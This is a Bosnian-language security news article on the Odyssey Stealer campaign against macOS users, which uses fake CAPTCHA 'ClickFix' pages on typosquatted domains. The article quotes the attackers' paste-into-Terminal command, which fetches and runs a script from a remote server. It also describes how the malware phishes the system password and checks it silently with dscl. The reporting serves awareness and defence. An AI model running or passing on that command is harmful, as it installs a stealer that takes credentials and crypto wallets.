Nova sofisticirana kampanja zlonamjernog softvera usmjerena na korisnike macOS-a koristi obmanjujuće “Clickfix” taktike za distribuciju zlonamjernih AppleScriptova koji kradu osjetljive korisničke podatke i finansijske informacije.
Ova kampanja koristi domene s greškama u pisanju koji se gotovo identično podudaraju sa zakonitim finansijskim platformama i web stranicama Apple App Storea, stvarajući uvjerljivu fasadu koja navodi korisnike da izvrše opasne naredbe na svojim sistemima.
Napadi započinju kada korisnici nenamjerno posjete zlonamjerne domene koje prikazuju lažne upite za CAPTCHA u stilu Cloudflarea. Ove naizgled legitimne stranice za verifikaciju nalažu korisnicima macOS-a da kopiraju i lijepe Base64 kodirane naredbe u svoje terminalne aplikacije kako bi dokazali da nisu roboti.
Nakon izvršenja, ove naredbe pokreću sveobuhvatnu operaciju krađe podataka koja cilja na akreditive pretraživača, kriptovalutne novčanike i osjetljive lične podatke pohranjene u više aplikacija.
Istraživači iz kompanije Cyfirma identificirali su ovaj zlonamjerni softver kao Odyssey Stealer, preimenovanu verziju prethodno poznatog Poseidon Stealera, koji je sam nastao kao fork AMOS Stealera. Tim istraživača otkrio je više kontrolnih i zapovjednih panela povezanih s ovom aktivnošću, s infrastrukturom koja se uglavnom nalazi u Rusiji. Zlonamjerni softver pokazuje jasnu sklonost ka ciljanju korisnika u zapadnim zemljama, posebno u Sjedinjenim Američkim Državama i Evropskoj uniji, dok istovremeno upadljivo izbjegava žrtve u zemljama Zajednice nezavisnih država.
Odyssey Stealer predstavlja zabrinjavajući napredak u zlonamjernom softveru usmjerenom na macOS, kombinirajući taktike socijalnog inženjeringa sa sofisticiranim tehničkim mogućnostima. Za razliku od tradicionalnog zlonamjernog softvera koji se oslanja na ranjivosti softvera, ova kampanja iskorištava ljudsku psihologiju predstavljajući korisnicima poznato izgledajuće sigurnosne upite koji se čine kao rutinske procedure verifikacije. Napadači su pažljivo izradili svoje distribucijske web stranice kako bi replicirali povjerljive platforme, što otežava otkrivanje od strane nesuđenih korisnika.
Mehanizam infekcije zlonamjernog softvera oslanja se na višestepeni proces koji započinje pogrešnim pisanjem naziva domena i kulminira sveobuhvatnim kompromitiranjem sistema. Kada korisnici posjete zlonamjerne domene, susreću se sa profesionalno dizajniranim stranicama koje reproduciraju izgled legitimnih sistema za verifikaciju CAPTCHA. Lažni upit prikazuje upute za korisnike macOS-a da izvrše naredbu koja izgleda ovako: `curl -s http://odyssey1.to:3333/d?u=October | sh`. Ova naredba preuzima i izvršava AppleScript sa servera napadača za kontrolu i komandu. Skript koristi alfanumeričko zamagljivanje za skrivanje naziva funkcija, iako analiza otkriva njegovu pravu svrhu.
Nakon izvršenja, zlonamjerni softver stvara strukturu privremenog direktorija pomoću naredbe `mkdir`, specifično uspostavljajući `/tmp/lovemrtrump` kao svoju operativnu bazu. AppleScript zatim prikazuje uvjerljiv upit za autentifikaciju dizajniran da uhvati sistemsku lozinku korisnika. Da bi tiho validirao ukradene akreditive, koristi naredbu `dscl` na macOS-u s parametrom `authonly`, osiguravajući da proces verifikacije ostaje skriven od korisnika. Ova tehnika omogućava zlonamjernom softveru da potvrdi valjanost lozinke bez aktiviranja sistemskih upozorenja ili sumnje korisnika, pokazujući duboko razumijevanje napadača o sigurnosnim mehanizmima macOS-a.